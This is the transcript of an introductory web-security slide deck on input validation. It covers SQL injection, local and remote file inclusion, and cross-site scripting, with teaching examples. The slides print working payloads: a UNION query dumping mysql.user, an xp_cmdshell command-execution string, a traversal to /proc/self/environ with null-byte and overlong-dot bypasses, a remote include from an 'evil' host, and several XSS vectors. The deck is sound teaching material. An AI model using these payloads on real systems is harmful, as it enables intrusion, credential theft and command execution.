web application security 101 - 14 data validation
Post on 10-May-2015
580 Views
Preview:
DESCRIPTION
TRANSCRIPT
Data ValidationCommon input validation problems.
Types Of ProblemsSQL Injection
Local File Includes
Cross-site Scripting
SQL InjectionSQL Injection is an attack where a partial or a complete SQL query is
inserted/injected into another query run by the targeted application.
Types Of SQL InjectionVanilla - when errors are displayed.
Blind - when no errors are displayed.
SQL BackendsThere are multiple SQL backends that have various features.
Common BackendsMsSQL (Transact-SQL)
MySQL
PostgreSQL
Oracle (PL/SQL)
Many More
SQL Injection In PrincipleWorks by injecting SQL parts in already existing queries.
SELECT * FROM table WHERE column = 'injected by the user'
In DetailAssuming that $value is a variable controlled by the user:
$query = "SELECT * FROM table WHERE column = '" + $value + "'";
When $value equals to ' OR '1'='1 then:
SELECT * FROM table WHERE column = '' OR '1'='1'
SQL Injection TechniquesUnion Selection - to obtain values from other tables.
SELECT * FROM table WHERE column = '' UNION SELECT 'a','b','c','d','e'
Boolean Selection - to create universally true or false statements.
SELECT * FROM table WHERE column = '' OR '1'='1'
Time Selection - to measure injection by timing the execution.
SELECT * FROM table WHERE column = '' OR IF(1=1, sleep(10), 'false'))--'
MsSQL Injection TechniquesTable enumeration - find the table structure.
SELECT * FROM table WHERE column = '' HAVING 1=1--'
SELECT * FROM table WHERE column = '' GROUP BY column1,columnN HAVING 1=1--
Code execution - running arbitrary commands.
SELECT * FROM table WHERE column = ''; exec master.dbo.xp_cmdshell 'command
Query delay - timing delay after query.
SELECT * FROM table WHERE column = ''; WAITFOR DELAY '0:0:30'
MySQL Injection Techniques Pt. 1Finding information - retrieving various server variables and functions.
SELECT * FROM table WHERE column = '' AND 1=0 UNION SELECT @@version, 'b',
User enumeration - retrieving MySQL server users and passwords.
SELECT * FROM table WHERE column = '' UNION SELECT * FROM mysql.user#'
MySQL Injection Techniques Pt. 2Table enumeration - retrieving MySQL server tables.
SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.tables#
Column enumeration - retrieving MySQL server columns.
SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.columns#
SQL Injection ToolsSqlninja
Sqlmap
SQL Injection Is ArtThere are many different types of tools and techniques with various
level of complexity used to exploit SQL Injection vulnerabilities.
File IncludesThis attack vector is used to perform arbitrary file/url read or
execution using low-level functions and application-specific features.
Types Of File IncludesLocal File Include - when the included file is local.
Remote File Include - when the included file is fetched remotely.
File Include In PrincipleWorks when user data reaches a function used to fetch a file.
<?php fetchfile("./path/to/file/injected by the user") ?>
In DetailAssuming that $value is a variable controlled by the user:
<?php fetchfile("./path/to/file/" . $value) ?>
When $value equals to ../../../index.php then:
<?php fetchfile("./path/to/file/../../../index.php") ?>
File Include Techniques Pt. 1Usage of ../ to traverse directory structure.
<?php fetchfile("./path/to/file/../../../index.php") ?>
Usage of null (0x00) to terminate strings for low level C functions.
<?php fetchfile("./path/to/file/../../../index.php\0.txt") ?>
File Include Techniques Pt. 2Usage of overlong dot (0xc0, 0xae) to by pass escape functions.
<?php fetchfile("./path/to/file/\xc0\xae./../../index.php\0.txt") ?>
Usage of system resources to cause other behaviour.
<?php fetchfile("./path/to/file/../../../../../proc/self/environ") ?>
Remote File IncludesThis type of problem occurs when injecting a remote file controlled
by the attacker. In this case, the attacker has a greater control over
the exploitation process if something special is done to the file.
<?php fetchfile("http://evil/path/to/file") ?>
FI Is ArtFile Include attacks are a popular mechanism for compromising web
applications.
Cross-site ScriptingIs a type of vulnerability where an attacker can bypass SOP (Same
Origin Policy) through client-side injection or by abusing forms of
configuration.
Types Of XSSReflected - when the injection is immediately returned.
Stored - when the injection is stored.
DOM-based - when the injection occurs due to JS.
Others - the are many other uncategorized varients.
XSS In PrincipleWorks by injecting fragments of HTML/JS inside the web page.
<span>injected by the user</span>
In DetailAssuming that $value is a variable controlled by the user:
<?php ?><span><?php echo $value ?></span>
When $value equals to <script>alert(1)</script> then:
<span><script>alert(1)</script></span>
XSS Techniques Pt. 1When script tags are sanitized or escaped.
<span><img src=a onerror=alert(1)></span>
When the injection occurs inside an event attribute.
<button onclick="alert(1)"></button>
XSS Techniques Pt. 2When the injection occurs inside JavaScript a tag.
<script>var a = ""; alert(1); "";</script>
When the injection occurs in multiple small places.
<span><script>alert(1)/* is something like */</script></span>
Stored XSSThe injection is temporarily or permanently stored.
<?php $_SESSION['name'] = $_GET['name'] ?>
Later on there is this code that causes for the XSS to occur:
<?php ?><span><?php echo $_SESSION['name'] ?></span>
DOM-based XSSThe injection may occur at any point but triggered via JavaScript.
<script>var match = document.location.search.match(/[?&]name=(\w+)/);
if (match) { document.write("Hello " + match[1]);}</script>
There are many different ways an injection can occur.
Other Forms Of XSSThe presence of crossdomain.xml may open the app to XSS.
<?xml version="1.0" encoding="UTF-8" ?><cross-domain-policy><allow-access-from domain="*"/></cross-domain-policy>
XSS Is ArtCross-site scripting is very popular and widely spread vulnerability.
Other Input Validations FlawsMemory Corruption
Command Injection
LDAP Injection
XML Injection
XPATH Injection
SSI Injection
Remote File Inclusion
Many, Many More
LabWe will be finding data validation problems.
top related